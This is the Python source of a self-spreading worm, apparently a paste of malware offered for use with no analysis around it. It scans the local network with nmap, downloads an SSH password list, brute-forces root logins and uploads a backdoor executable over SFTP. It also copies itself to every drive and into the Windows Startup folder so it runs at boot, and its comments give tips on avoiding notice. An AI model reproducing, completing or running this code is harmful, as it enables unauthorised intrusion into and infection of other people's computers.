worm

1. import nmap
2. import paramiko
3. import os
4. import socket
5. from urllib.request import urlopen
6. import urllib
7. import time
8. from ftplib import FTP
9. import ftplib
10. from shutil import copy2
11. import win32api
12. import netifaces
13. from threading import Thread
14.  
15. # ----- -----
16. import networking
17. # ----- -----
18.  
19. # ------------------- Logging ----------------------- #
20. import coloredlogs, logging
21. logger = logging.getLogger(__name__)
22. coloredlogs.install(fmt='%(message)s',level='DEBUG', logger=logger)
23. # --------------------------------------------------- #
24.  
25.  
26. # gets gateway of the network
27. gws = netifaces.gateways()
28. gateway = gws['default'][netifaces.AF_INET][0]
29.  
30. def scan_hosts(port):
31.     """
32.    Scans all machines on the same network that
33.     have the specified port enabled
34.    Returns:
35.        IP addresses of hosts
36.    """
37.     logger.debug(f"Scanning machines on the same network with port {port} open.")
38.  
39.  
40.     logger.debug("Gateway: " + gateway)
41.  
42.     port_scanner = nmap.PortScanner()
43.     port_scanner.scan(gateway + "/24", arguments='-p'+str(port)+' --open')
44.  
45.     all_hosts = port_scanner.all_hosts()
46.  
47.     logger.debug("Hosts: " + str(all_hosts))
48.     return all_hosts
49.  
50.  
51. def download_ssh_passwords(filename):
52.     """
53.     Downloads most commonly used ssh passwords from a specific url
54.      Clearly, you can store passwords in a dictionary, but i found this more comfortable
55.    Args:
56.        filename - Name to save the file as.
57.    """
58.  
59.     # TODO:130 This wordlist contains only few passwords. You would need a bigger one for real bruteforcing. \_(OwO)_/
60.  
61.     logger.debug("Downloading passwords...")
62.     url = "https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt"
63.     urllib.request.urlretrieve(url, filename)
64.     logger.debug("Passwords downloaded!")
65.  
66.  
67. def connect_to_ftp(host, username, password):
68.     # TODO:30 : Finish this function + Add bruteforcing
69.     try:
70.         ftp = FTP(host)
71.         ftp.login(username, password)
72.     except ftplib.all_errors as error:
73.         logger.error(error)
74.         pass
75.  
76.  
77. def connect_to_ssh(host, password):
78.     """
79.    Tries to connect to a SSH server
80.    Returns:
81.        True - Connection successful
82.        False - Something went wrong
83.    Args:
84.        host - Target machine's IP
85.        password - Password to use
86.    """
87.  
88.     # TODO:120 Pass usernames to the function too
89.  
90.     client = paramiko.SSHClient()
91.     client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
92.     try:
93.         logger.debug("Connecting to: " + host)
94.         client.connect(host, 22, "root", password)
95.         logger.debug("Successfully connected!")
96.  
97.         sftp = client.open_sftp()
98.         sftp.put('backdoor.exe', "destination") # change this.
99.  
100.         return True
101.     except socket.error:
102.         logger.error("Computer is offline or port 22 is closed")
103.         return False
104.     except paramiko.ssh_exception.AuthenticationException:
105.         logger.error("Wrong Password or Username")
106.         return False
107.     except paramiko.ssh_exception.SSHException:
108.         # socket is open, but not SSH service responded
109.         logger.error("No response from SSH server")
110.         return False
111.  
112.  
113. def bruteforce_ssh(host, wordlist):
114.     """
115.    Calls connect_to_ssh function and
116.    tries to bruteforce the target server.
117.    Args:
118.        wordlist - TXT file with passwords
119.    """
120.     # TODO:10 : Bruteforce usernames too
121.     file = open(wordlist, "r")
122.     for line in file:
123.         connection = connect_to_ssh(host, line)
124.         print(connection)
125.         time.sleep(5)
126.  
127. def drivespreading():
128.     # This function makes the worm copy itself on other drives on the computer
129.     # (also on the "startup" folder to be executed every time the computer boots)
130.    
131.     # WARNING: This function is very obvious to the user. The worm will be suddenly on every drive.
132.     # You may want to change the code and e.g. copy the worm only on new drives
133.     bootfolder = os.path.expanduser('~') + "/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/"
134.  
135.     while True:
136.         drives = win32api.GetLogicalDriveStrings()
137.         drives = drives.split('\000')[:-1]
138.         print(drives)
139.         for drive in drives:
140.             try:
141.                 if "C:\\" == drive:
142.                     copy2(__file__, bootfolder)
143.                 else:
144.                     copy2(__file__, drive)
145.             except:
146.                 pass
147.        
148.         time.sleep(3)
149.  
150. def start_drive_spreading():
151.     # Starts "drivespreading" function as a threaded function.
152.     # This means that the code will spread on drives and execute other functions at the same time.
153.     thread = Thread(target = drivespreading)
154.     thread.start()
155.    
156. def main():
157.     start_drive_spreading()
158.  
159.  
160. if __name__ == "__main__":
161.     main()